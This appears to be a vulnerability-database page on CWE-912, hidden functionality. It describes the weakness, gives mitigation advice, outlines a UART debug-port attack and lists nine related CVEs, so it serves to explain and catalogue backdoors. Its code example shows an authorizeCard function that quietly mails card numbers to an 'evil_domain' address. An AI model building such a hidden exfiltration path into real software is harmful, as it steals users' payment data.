69 vulnerabilities classified as CWE-912 (隐藏功能). AI Chinese analysis included.
CWE-912 represents a software weakness where undocumented, unspecified, or non-obvious functionality exists within a product, often bypassing standard user interfaces or administrative controls. This vulnerability is typically exploited by attackers who discover these hidden pathways, such as debug ports, developer shortcuts, or intentional backdoors, to gain unauthorized access or execute malicious actions without detection. Developers can mitigate this risk by enforcing strict code reviews to identify and remove unnecessary or obscure code paths, ensuring comprehensive documentation of all features, and implementing rigorous access controls that restrict visibility to only intended, documented interfaces. By adhering to secure coding standards and maintaining clear separation between production and development code, organizations can eliminate unintended entry points, thereby reducing the attack surface and preventing adversaries from leveraging hidden mechanisms for unauthorized system manipulation or data exfiltration.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents.| CVE ID | Title | CVSS | Severity | Published |
|---|---|---|---|---|
| CVE-2021-24867 | Backdoored Plugins & Themes from AccessPress Themes — Frontend Post WordPress Plugin – AccessPress Anonymous Post | 9.4 | - | 2022-02-21 |
| CVE-2021-43987 | mySCADA myPRO — myPRO | 9.8 | Critical | 2021-12-23 |
| CVE-2020-28593 | amazon COSORI Smart 安全漏洞 — Cosori | 8.1 | - | 2021-04-15 |
| CVE-2021-25371 | Samsung SMR 安全漏洞 — Samsung Mobile Devices | 6.1 | Medium | 2021-03-26 |
| CVE-2020-3352 | Cisco Firepower Threat Defense Software Hidden Commands Vulnerability — Cisco Firepower Threat Defense Software | 5.5 | - | 2020-10-21 |
| CVE-2020-12504 | Pepperl+Fuchs improper authorization affects multiple Comtrol RocketLinx products — P+F Comtrol RocketLinx | 9.8 | Critical | 2020-10-15 |
| CVE-2020-16204 | Red Lion N-Tron 安全漏洞 — N-Tron 702-W / 702M12-W | 9.8 | - | 2020-09-01 |
| CVE-2020-14487 | OpenClinic GA — OpenClinic GA | 9.4 | Critical | 2020-07-29 |
| CVE-2018-17919 | Xiongmai XMeye P2P Cloud Server 安全漏洞 — XMeye P2P Cloud Server | 8.2 | - | 2018-10-10 |
Vulnerabilities classified as CWE-912 (隐藏功能) represent 69 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.